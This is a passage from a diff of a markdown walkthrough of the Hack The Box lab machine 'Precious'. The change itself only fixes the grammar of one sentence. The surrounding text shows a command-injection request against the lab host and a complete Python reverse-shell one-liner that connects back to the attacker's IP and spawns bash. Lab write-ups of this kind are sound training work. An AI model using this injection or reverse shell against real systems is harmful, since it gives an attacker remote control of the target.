JavaliMZ/JavaliMZ.github.io/src/HTB-Linux-Easy-Precious.md

     data = {
         'url': f"http://10.10.14.144/?name=%20`{cmd}`",
         }
     response = requests.post('http://precious.htb/', data=data, verify=False)
 ```

 Now, we can try to get a reverse shell.
 A reverse shell is a type of connection to get a shell in the target machine.
 But the way we got this is tricky.
-We need to find a way to the target machine send is own shell to our machine.
+We need to find a way to the target machine send his own shell to our machine.
 Is like we try to enter in a house, and we need to find a way that the house open his own door to give us the access...
 The command worked on the machine was this:

 ```bash
 python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.144",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'